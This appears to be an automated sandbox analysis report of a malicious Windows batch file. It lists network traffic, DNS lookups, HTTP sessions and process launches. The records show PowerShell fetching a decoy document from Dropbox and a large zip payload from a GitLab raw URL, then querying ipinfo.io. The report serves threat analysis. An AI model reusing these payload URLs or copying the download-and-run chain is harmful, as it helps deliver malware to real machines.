                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.973242044 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.973248005 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.973309040 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.973550081 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.973573923 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.973612070 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.973618031 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.973630905 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.973658085 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.973959923 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                      Nov 18, 2024 08:35:10.524962902 CET192.168.2.61.1.1.10x9077Standard query (0)www.dropbox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 18, 2024 08:35:12.432338953 CET192.168.2.61.1.1.10x1a88Standard query (0)uc4fa63018fc4108da48020b9c7b.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 18, 2024 08:35:17.852488041 CET192.168.2.61.1.1.10xc592Standard query (0)gitlab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 18, 2024 08:37:17.560667992 CET192.168.2.61.1.1.10x89cdStandard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                      Nov 18, 2024 08:35:10.532393932 CET1.1.1.1192.168.2.60x9077No error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 18, 2024 08:35:10.532393932 CET1.1.1.1192.168.2.60x9077No error (0)www-env.dropbox-dns.com162.125.66.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 18, 2024 08:35:12.453296900 CET1.1.1.1192.168.2.60x1a88No error (0)uc4fa63018fc4108da48020b9c7b.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 18, 2024 08:35:12.453296900 CET1.1.1.1192.168.2.60x1a88No error (0)edge-block-www-env.dropbox-dns.com162.125.66.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 18, 2024 08:35:17.859571934 CET1.1.1.1192.168.2.60xc592No error (0)gitlab.com172.65.251.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 18, 2024 08:37:17.569416046 CET1.1.1.1192.168.2.60x89cdNo error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      0192.168.2.649711162.125.66.184435176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-18 07:35:11 UTC189OUTGET /scl/fi/e2xjf5lc4ozmjfx1xvbkr/16_Advertising_Campaign_and_Collaboration.docx?rlkey=gqzq7m8iwlwtriryr5u9inan8&st=5dnoyqbj&dl=1 HTTP/1.1
                                                                                                                                                                                                                      Host: www.dropbox.com
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      2024-11-18 07:35:12 UTC4091INHTTP/1.1 302 Found
                                                                                                                                                                                                                      Content-Security-Policy: style-src https://* 'unsafe-inline' 'unsafe-eval' ; img-src https://* data: blob: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https:/ [TRUNCATED]
                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                      Location: https://uc4fa63018fc4108da48020b9c7b.dl.dropboxusercontent.com/cd/0/get/CemSesZ3f5jWCChWCH5OtQqhHQpWjsAyrwFiI1iQ0e6pKvtMg1HKyHYTcNxwQeD4edUrVZ7Mq4LJFoqAFRIP99fxyFnZpFWmLGBIzlC8iNcmqgdhWcf8PJU05sV4-8covkg_C9Z6Br8EXYawtGhwe3Td/file?dl=1#
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                      Set-Cookie: gvc=MTMyODIzMzQwMDUyMDA3ODM0OTU1NTgxMDYyMTExMTgwMDgxMjQx; Path=/; Expires=Sat, 17 Nov 2029 07:35:11 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                      Set-Cookie: t=Um7EzVrrGdnwuqa_OSTV-cUB; Path=/; Domain=dropbox.com; Expires=Tue, 18 Nov 2025 07:35:11 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                      Set-Cookie: __Host-js_csrf=Um7EzVrrGdnwuqa_OSTV-cUB; Path=/; Expires=Tue, 18 Nov 2025 07:35:11 GMT; Secure; SameSite=None
                                                                                                                                                                                                                      Set-Cookie: __Host-ss=kF3GN7JNcY; Path=/; Expires=Tue, 18 Nov 2025 07:35:11 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                      Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sat, 17 Nov 2029 07:35:11 GMT
                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                      X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                      X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                      X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                      Content-Length: 17
                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 07:35:12 GMT
                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                      Server: envoy
                                                                                                                                                                                                                      Cache-Control: no-cache, no-store
                                                                                                                                                                                                                      X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                      X-Dropbox-Request-Id: 8e68ee380ec947ce9c9bf734db569e1f
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      2024-11-18 07:35:12 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                      Data Ascii: ...status=302-->


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      1192.168.2.649752172.65.251.784436452C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-18 07:35:18 UTC100OUTGET /bose1511/mkt1511/-/raw/main/16Fukrun.zip HTTP/1.1
                                                                                                                                                                                                                      Host: gitlab.com
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      2024-11-18 07:35:18 UTC284INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 07:35:18 GMT
                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                      Content-Length: 68971084
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      cache-control: max-age=60, public, must-revalidate, stale-while-revalidate=60, stale-if-error=300, s-maxage=60
                                                                                                                                                                                                                      content-disposition: attachment
                                                                                                                                                                                                                      2024-11-18 07:35:18 UTC2217INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 61 70 74 63 68 61 2e 6e 65 74 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 6e 73 2e 68 74 6d 6c 20 68 74 74 70 73 3a 2f 2f 2a 2e 7a 75 6f 72 61 2e 63 6f 6d 2f 61 70 70 73 2f 50 75 62 6c 69 63 48 6f 73 74 65 64 50 61 67 65 4c 69 74 65 2e 64 6f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
                                                                                                                                                                                                                      Data Ascii: content-security-policy: base-uri 'self'; child-src https://www.google.com/recaptcha/ https://www.recaptcha.net/ https://www.googletagmanager.com/ns.html https://*.zuora.com/apps/PublicHostedPageLite.do https://gitlab.com/admin/ https://gitlab.com/assets/
                                                                                                                                                                                                                      2024-11-18 07:35:18 UTC575INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 63 65 6f 36 68 4a 76 70 56 5a 6a 78 51 50 66 51 33 4a 35 30 79 31 62 70 34 63 57 79 69 32 4c 59 53 37 31 4e 41 75 73 5a 4c 79 66 31 70 75 50 65 34 6f 53 44 72 38 51 4e 4a 71 63 6d 30 33 63 49 62 6f 44 71 59 57 74 34 66 79 41 65 46 69 47 25 32 46 38 30 7a 33 4f 25 32 42 72 61 43 37 4e 73 70 64 78 6d 4a 33 4f 6b 6f 35 35 72 57 73 66 50 25 32 46 56 78 4d 55 62 63 50 62 41 6c 57 37 47 38 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20
                                                                                                                                                                                                                      Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ceo6hJvpVZjxQPfQ3J50y1bp4cWyi2LYS71NAusZLyf1puPe4oSDr8QNJqcm03cIboDqYWt4fyAeFiG%2F80z3O%2BraC7NspdxmJ3Oko55rWsfP%2FVxMUbcPbAlW7G8%3D"}],"group":"cf-nel","max_age":604800}NEL:
                                                                                                                                                                                                                      2024-11-18 07:35:18 UTC1369INData Raw: 50 4b 03 04 0a 00 00 00 00 00 8b a5 66 59 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 74 63 6c 2f 50 4b 03 04 0a 00 00 00 00 00 89 a5 66 59 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 00 74 63 6c 2f 64 64 65 31 2e 34 2f 50 4b 03 04 14 00 00 00 08 00 88 b1 46 58 9f ec 64 52 cf 00 00 00 da 01 00 00 17 00 00 00 74 63 6c 2f 64 64 65 31 2e 34 2f 70 6b 67 49 6e 64 65 78 2e 74 63 6c ad 8e c1 4a 03 31 14 45 d7 0d e4 1f 6e 8b 74 67 b0 30 a0 1d 70 e7 27 b8 1b b3 48 27 2f f1 d9 90 0c 49 5a 84 32 ff 6e a6 a0 20 6e 5c f4 2d 2f f7 dc 77 d8 e1 32 70 74 09 e5 dd 64 b2 81 0f f4 59 29 16 4e 51 63 fd 8c 8d b2 21 6c 66 64 aa a7 1c a5 b8 02 93 19 8f c6 13 ce c5 54 2e 8e a9 e0 27 9b 72 3a b3 25 bc 8e 41 63 af 1e ee f5 8c 8b 14 68 f7 5d 61 17 89 2c 59 d8 d6 db a9 4e 75 78
                                                                                                                                                                                                                      Data Ascii: PKfYtcl/PKfYtcl/dde1.4/PKFXdRtcl/dde1.4/pkgIndex.tclJ1Entg0p'H'/IZ2n n\-/w2ptdY)NQc!lfdT.'r:%Ach]a,YNux
                                                                                                                                                                                                                      2024-11-18 07:35:18 UTC1369INData Raw: d2 c1 8f 3c 6d 7f f7 4f 82 55 f1 2e 88 b9 ff 0d d0 2f 40 18 5a e7 62 ff 6d 3d 86 b6 0c 62 44 eb 0a 2e 04 2a c2 08 1a 9a db e2 73 07 9f b5 b4 6b 51 98 a7 b0 89 fc b9 ab eb 00 aa ff 99 ce 44 43 db 7a 1a cd 5b 20 bc 7b e6 91 06 82 74 c2 57 8d c4 35 62 68 fb 0b 1f d9 81 52 55 a5 6d 02 6a 9d db 52 82 9a 2a f7 ba 43 0e 50 33 59 78 b6 14 89 b7 68 78 a3 1d 00 b3 14 fb 1f 50 e8 c1 8d 16 5b 75 b5 61 7c 2b ad 67 07 64 1d f6 80 a2 31 3c bc 13 b2 90 d2 1a da 1e 80 94 4b 3e 60 18 6f 63 d5 f6 c0 46 a7 16 98 b6 69 fc 9f 3a 42 89 80 ff 23 90 77 96 aa 03 01 c5 e1 6b 2a 8b 30 a6 53 b7 e2 74 27 b2 b8 62 79 a3 a5 85 b2 50 2f b5 94 b3 10 5a 61 55 da 07 a9 ad 03 e4 21 0f 0e 8c 41 91 06 35 fd af e3 9c ca 36 5d ff 16 ad 5a 2a 56 1e 85 85 15 42 f5 48 e8 76 ca 47 f7 e2 26 12 de 7c
                                                                                                                                                                                                                      Data Ascii: <mOU./@Zbm=bD.*skQDCz[ {tW5bhRUmjR*CP3YxhxP[ua|+gd1<K>`ocFi:B#wk*0St'byP/ZaU!A56]Z*VBHvG&|
                                                                                                                                                                                                                      2024-11-18 07:35:18 UTC1369INData Raw: 18 ff 2a 9c ba 83 d0 c3 10 f9 fb 6f 26 99 bc 39 1b 7b 3e a2 98 ae 9b 85 cb 1a 68 d5 17 a1 f7 b7 99 56 e3 12 58 ef 3b 87 f1 14 6e 0c 95 b7 c3 20 8e d0 58 67 bb 65 61 7e 84 11 7b 94 93 9b 8a f8 9e 94 2f bf 41 be 09 6d 49 95 e4 9b 94 5a f2 45 65 9f 23 64 a7 d9 95 f5 c3 57 91 97 ed a0 e9 95 5f 73 07 ab 70 86 9f 9b 89 74 ce f6 8f 26 cd 5c a2 8b 35 3a 86 36 d5 ac f5 14 62 c7 21 a3 26 2a 95 ae fd e8 3b 71 7d 52 f6 57 db e7 cc 5d ee 3f 83 fb 7f 21 f2 d3 66 d4 f0 61 b6 9b 53 39 d9 88 f7 29 dc 53 48 ab 4e 94 9f 30 12 6d ec 6d 2b 57 6f d4 d1 7b 44 d9 b4 ba 90 6f ab 8f 92 28 2a 37 18 51 14 31 62 c8 29 bc 4c 0c 19 85 df 58 0c c2 ca 2b 89 e1 87 59 24 06 20 f5 97 82 98 b1 f6 72 f2 3d 05 6a 8f 51 cc ee 82 c8 d4 73 44 57 7f 23 7a 5d fa ed 25 44 3d 46 b3 40 0b 60 1d 65 c5
                                                                                                                                                                                                                      Data Ascii: *o&9{>hVX;n Xgea~{/AmIZEe#dW_spt&\5:6b!&*;q}RW]?!faS9)SHN0mm+Wo{Do(*7Q1b)LX+Y$ r=jQsDW#z]%D=F@`e
                                                                                                                                                                                                                      2024-11-18 07:35:18 UTC1369INData Raw: 34 6f 32 65 3f 57 b3 56 c8 ca ce 8f dc a1 a7 2d bd 74 e2 b3 da e8 92 9b d3 5d f2 dd 66 97 fc ee 9a ce 78 f9 52 68 28 ca 1f cb fa 7c b4 e7 a6 4f a0 f5 34 0d 84 00 92 03 6c 8b 74 53 20 9c 20 4d 0e 84 13 25 53 e0 ac 56 02 75 d7 77 e0 a0 42 b9 af 02 18 c8 84 7c 0b cf ff 07 e6 af 83 7c 3a cf cf c1 fc 08 c8 67 f3 bc 8b 0c ce b8 77 5c ea f2 88 84 96 bd a8 f0 91 c8 f2 80 8b a2 f9 bf 93 aa 1e 8d 3d ec fd eb 54 75 69 58 93 a3 f1 92 14 8d 93 ae 14 1f 0d 9e a7 f8 c8 98 44 94 af 77 45 e2 23 26 a0 01 f3 54 9e 75 07 3d 10 01 9c 43 2f ad 1c 42 e3 a0 db e2 90 4f c0 7f 9b 43 7e 1b 54 ac dd 21 f7 03 d8 0a cf 0e 78 f6 c0 b3 13 cf 1b 5b f0 5f 0d 1e a9 7d 67 8a fd f7 1a 46 b1 70 56 26 ee cd 18 d7 69 5c b4 51 11 af f9 3a c4 1e ec bf 65 34 f2 b0 42 87 2b a3 94 56 03 0c f2 14 18
                                                                                                                                                                                                                      Data Ascii: 4o2e?WV-t]fxRh(|O4ltS M%SVuwB||:gw\=TuiXDwE#&Tu=C/BOC~T!x[_}gFpV&i\Q:e4B+V
                                                                                                                                                                                                                      2024-11-18 07:35:18 UTC1369INData Raw: 4f 84 6e fe 6a 8b e5 01 e7 ba ee 8c a2 f0 1e ba f5 8c 6e bb 6a 9c 6d ef c9 fa df 42 db 3f e8 f1 06 cf e0 bc e8 90 3b b3 3a a0 67 5c 73 fc fc d4 81 ae a3 38 81 47 5e b8 10 da 29 d6 ec f1 c8 2f ab 21 48 b7 b3 f5 a2 94 0b 9e 29 f9 a4 d9 c1 22 ee 88 e3 19 2f 3f 7d 5d 35 01 37 15 e7 26 97 fc 47 59 ef 21 56 57 4c 40 af f1 b0 62 5a 00 89 01 0f 7a 61 d9 a8 64 00 ad 56 3f 63 f1 04 c6 4c e0 d7 f6 7a 1c c7 b3 9f ab e3 a0 f6 49 d8 9e f0 0f 45 f0 30 fa 53 f3 e2 f4 ec a5 e1 38 e0 35 4f e1 c9 29 de 24 ee 9b 87 c6 de fd ae 91 6b 08 25 b9 8e 6c 9f a7 ea 08 b9 35 43 6a f2 c8 3c 5a b2 b6 84 4b 97 ac 48 e5 7d a4 22 53 41 45 aa a9 67 7d d7 a4 7f a2 22 fd fd 68 7c 62 a7 38 1b b7 13 d3 f1 f1 31 53 3c 89 50 6f 8e 8f 4c b1 89 f2 5d e3 f9 14 8f c2 11 ff db 67 91 19 3d 93 8a 5b e4
                                                                                                                                                                                                                      Data Ascii: OnjnjmB?;:g\s8G^)/!H)"/?}]57&GY!VWL@bZzadV?cLzIE0S85O)$k%l5Cj<ZKH}"SAEg}"h|b81S<PoL]g=[
                                                                                                                                                                                                                      2024-11-18 07:35:18 UTC1369INData Raw: 7a 98 67 47 c7 78 98 03 39 44 50 31 7d 02 d8 81 bb 87 b6 88 ac 9e 2b bb 97 7b 47 47 b6 03 c9 23 eb 5f e0 ef 99 7c 9e 3e 64 f8 a6 8f 8e 71 9e 80 b3 08 19 d8 58 86 bc a6 ac 1e a4 06 76 76 8f 62 aa 51 29 a2 48 2f d1 3b e7 cd 11 bd f3 b4 bd c7 fd b8 e3 1f 44 dc 8a d3 f8 d6 dd 49 43 db 5b 9a c8 cd 56 d6 71 da b1 de 32 e1 9d 16 cd 58 e2 cd 74 c3 84 77 bf f8 6e 68 2f be 60 80 56 f8 b7 74 7a 67 7a 7f 66 54 aa ea cd 87 2c 1c 23 5c e1 45 31 70 41 ab ce 1f cc 9e 68 58 f0 9a 18 e3 40 fd 14 6a c9 4f ec a0 42 de 5e 75 a3 4c df 1d a2 89 86 fd 51 6e 25 4d 77 d1 9d fb 51 a5 c0 ea 96 4d f5 33 f9 db 84 f9 74 2b fe 5a 56 8f 5d 79 74 13 bd 44 28 4d 92 53 43 76 25 98 60 cf 39 62 78 e4 10 bd 1e 25 dc 4a 6d 0f 71 49 f4 ef e2 c8 1b 89 06 99 07 58 bf 78 b0 60 23 0a fe df 3b e6 80
                                                                                                                                                                                                                      Data Ascii: zgGx9DP1}+{GG#_|>dqXvvbQ)H/;DIC[Vq2Xtwnh/`VtzgzfT,#\E1pAhX@jOB^uLQn%MwQM3t+ZV]ytD(MSCv%`9bx%JmqIXx`#;
                                                                                                                                                                                                                      2024-11-18 07:35:18 UTC1369INData Raw: ff 3d b0 ca e1 e7 c9 c2 3b a0 c3 a0 f0 9d 4c 6e 4e b3 79 54 c8 ef 05 65 a1 9a ae 07 85 37 a7 f2 9a 36 48 9f 9c 86 4b e1 97 80 c1 6e bb 84 9f 4e e5 2b ad 4b f8 8d 9a da 43 b7 22 b7 75 e0 ea f9 19 b6 ec 4a d4 68 e3 f0 b2 5e 3f 95 d8 4c 34 47 90 1a 40 0e 4e 51 91 d0 f0 d9 11 c0 a1 82 d3 17 38 90 dd 89 72 a0 6f 03 81 0f 70 42 31 cd a6 93 bb ff c4 98 20 4b a1 ef f2 14 e1 45 2a cc 89 69 38 9f e9 39 62 a0 0a 1c 33 bc b7 a9 41 ab 5a ee 96 bb f9 fd 0d 9a 5e 3c 2e c6 0b 50 f4 1c 4b d1 d7 7b 23 15 df af 0f 28 da 8d bf c4 c9 2b 5b bb 3a 32 77 e6 62 51 fe 50 7d 05 bb 04 f9 7b 69 c6 b6 b7 a6 7d 1f 53 39 9d 7e 49 0c 78 d3 f1 28 2a 5d 31 ed 27 7f c9 09 d1 96 d3 a8 98 1c 78 f6 d6 21 4e c7 b4 8d a7 43 1e 33 cf 67 63 de 09 a3 f4 80 55 3d 65 16 b3 9c f8 18 c5 ac 7d 22 7d 67
                                                                                                                                                                                                                      Data Ascii: =;LnNyTe76HKnN+KC"uJh^?L4G@NQ8ropB1 KE*i89b3AZ^<.PK{#(+[:2wbQP}{i}S9~Ix(*]1'x!NC3gcU=e}"}g
                                                                                                                                                                                                                      2024-11-18 07:35:18 UTC1369INData Raw: b5 03 dd ba 2e 61 14 24 50 dd 83 82 11 52 f6 33 9d 66 29 3b d0 6d ee 12 ce 4d 64 4c a0 82 2f 26 d2 8f 02 24 f4 3a 26 f6 39 72 fa fc e9 44 c9 72 6a ee 29 bf 3e a0 ef 83 52 5b 70 dc 11 f5 de 3b 03 fd 61 89 e6 cb 58 d6 49 5b 5f e7 e1 c3 59 1d 73 84 03 50 03 b6 90 4e 65 92 56 40 29 27 d2 ff 24 fa 9f 41 ff 27 d3 ff a9 f4 3f 93 fe 5b e9 ff f9 c4 21 fc 19 fa b6 d3 4e 4d 27 d0 e4 fb a1 47 b6 83 f9 7f c5 25 1f 0b eb 59 dc 6e 8b 76 d7 29 03 bb 7f b2 07 de 3d eb 96 7b ec 67 58 a2 5b 3e 26 5d 65 97 6d 3a 4f 65 7e e2 17 7d ee 84 63 62 65 b7 7b e2 31 57 65 e7 22 39 cd 28 ca 79 46 0c f0 e4 3c dd 19 87 26 c1 20 a5 1a 76 01 0c 9c 1a 74 27 74 bb b3 a0 9b 9e d5 fd b5 9f 80 6d 98 54 48 ac 5c 16 af 29 a7 0e 5f e1 13 53 3e 69 1b 34 b4 15 73 97 e6 83 07 3d b4 6f ad e9 ff f2 3c
                                                                                                                                                                                                                      Data Ascii: .a$PR3f);mMdL/&$:&9rDrj)>R[p;aXI[_YsPNeV@)'$A'?[!NM'G%Ynv)={gX[>&]em:Oe~}cbe{1We"9(yF<& vt'tmTH\)_S>i4s=o<


                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                      Start time:02:35:06
                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\bose1511mkt.bat" "
                                                                                                                                                                                                                      Imagebase:0x7ff690590000
                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                      Target ID:1
                                                                                                                                                                                                                      Start time:02:35:06
                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                                      Start time:02:35:06
                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:chcp.com 437
                                                                                                                                                                                                                      Imagebase:0x7ff67fc60000
                                                                                                                                                                                                                      File size:14'848 bytes
                                                                                                                                                                                                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:4
                                                                                                                                                                                                                      Start time:02:35:06
                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:fInd
                                                                                                                                                                                                                      Imagebase:0x7ff601620000
                                                                                                                                                                                                                      File size:17'920 bytes
                                                                                                                                                                                                                      MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:5
                                                                                                                                                                                                                      Start time:02:35:06
                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:findstr /L /I set "C:\Users\user\Desktop\bose1511mkt.bat"
                                                                                                                                                                                                                      Imagebase:0x7ff694e50000
                                                                                                                                                                                                                      File size:36'352 bytes
                                                                                                                                                                                                                      MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                                      Start time:02:35:06
                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:findstr /L /I goto "C:\Users\user\Desktop\bose1511mkt.bat"
                                                                                                                                                                                                                      Imagebase:0x7ff694e50000
                                                                                                                                                                                                                      File size:36'352 bytes
                                                                                                                                                                                                                      MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                                      Start time:02:35:06
                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:findstr /L /I echo "C:\Users\user\Desktop\bose1511mkt.bat"
                                                                                                                                                                                                                      Imagebase:0x7ff694e50000
                                                                                                                                                                                                                      File size:36'352 bytes
                                                                                                                                                                                                                      MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:moderate
